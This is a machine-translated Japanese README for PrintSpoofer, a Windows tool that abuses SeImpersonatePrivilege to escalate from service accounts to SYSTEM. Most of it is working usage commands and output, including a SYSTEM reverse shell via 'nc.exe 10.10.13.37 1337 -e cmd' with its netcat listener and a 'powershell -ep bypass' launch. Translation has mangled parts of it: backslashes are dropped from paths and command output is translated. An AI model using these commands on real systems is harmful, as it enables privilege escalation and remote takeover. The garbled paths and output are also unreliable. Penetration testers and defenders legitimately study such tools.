プリントスプーファー
PrintSpoofer
Windows 10 および Server 2016/2019 でSeImpersonatePrivilege悪用して、LOCAL/NETWORK SERVICE から SYSTEM へ。
-hオプションを使用してヘルプ メッセージを確認できます。
C:ツール>PrintSpoofer.exe -h PrintSpoofer v0.1 (@itm4n 著) 現在のユーザーが SeImpersonate 権限を持っている場合、このツールは印刷機能を利用します。 SYSTEM トークンを取得し、CreateProcessAsUser() でカスタム コマンドを実行するスプーラー サービス 引数: -cコマンド *CMD* を実行します。 -i 現在のコマンド プロンプトで新しいプロセスと対話します (デフォルトは非対話型です)。 -d このセッション *ID* に対応する新しいプロセスをデスクトップ上に生成します (qwinsta で ID を確認してください) -h それは私です:) 例: - 現在のコンソールで PowerShell を SYSTEM として実行します PrintSpoofer.exe -i -c powershell.exe - セッション 1 のデスクトップに SYSTEM コマンド プロンプトを生成します。 PrintSpoofer.exe -d 1 -c cmd.exe - SYSTEM リバースシェルを取得する PrintSpoofer.exe -c "c:Tempnc.exe 10.10.13.37 1337 -e cmd"
対話型シェルをお持ちの場合は、現在のコンソールで新しい SYSTEM プロセスを作成できます。
使用例: バインド シェル、リバース シェル、 psexec.pyなど。
C:TOOLS>PrintSpoofer.exe -i -c cmd [+] 見つかった権限: SeImpersonatePrivilege [+] 名前付きパイプのリスニング... [+] CreateProcessAsUser() OK Microsoft Windows [バージョン 10.0.19613.1000] (c) 2020 Microsoft Corporation.無断転載を禁じます。 C:WINDOWSsystem32>whoami NT 権限システム
コマンドを実行できるが、対話型シェルがない場合は、新しい SYSTEM プロセスを作成し、対話せずにすぐに終了できます。
使用例: WinRM、WebShell、 wmiexec.py 、 smbexec.pyなど。
リバースシェルを作成します。
C:TOOLS>PrintSpoofer.exe -c "C:TOOLSnc.exe 10.10.13.37 1337 -e cmd" [+] 見つかった権限: SeImpersonatePrivilege [+] 名前付きパイプのリスニング... [+] CreateProcessAsUser() OK
Netcat リスナー:
C:ツール>nc.exe -l -p 1337 Microsoft Windows [バージョン 10.0.19613.1000] (c) 2020 Microsoft Corporation.無断転載を禁じます。 C:WINDOWSsystem32>whoami NT 権限システム
ローカルまたは RDP (VDI を含む) 経由でログオンしている場合は、デスクトップ上に SYSTEM コマンド プロンプトを起動できます。まず、コマンドqwinstaでセッション ID を確認し、オプション-dでこの値を指定します。
使用例: ターミナル セッション (RDP)、VDI
C:ツール>qwinsta セッション名 ユーザー名 ID 状態 タイプ デバイス サービス 0 ディスク コンソール管理者 1 アクティブ >rdp-tcp#3 lab-user 3 アクティブ rdp-tcp 65536 リッスン C:TOOLS>PrintSpoofer.exe -d 3 -c "powershell -ep bypass" [+] 見つかった権限: SeImpersonatePrivilege [+] 名前付きパイプのリスニング... [+] CreateProcessAsUser() OK
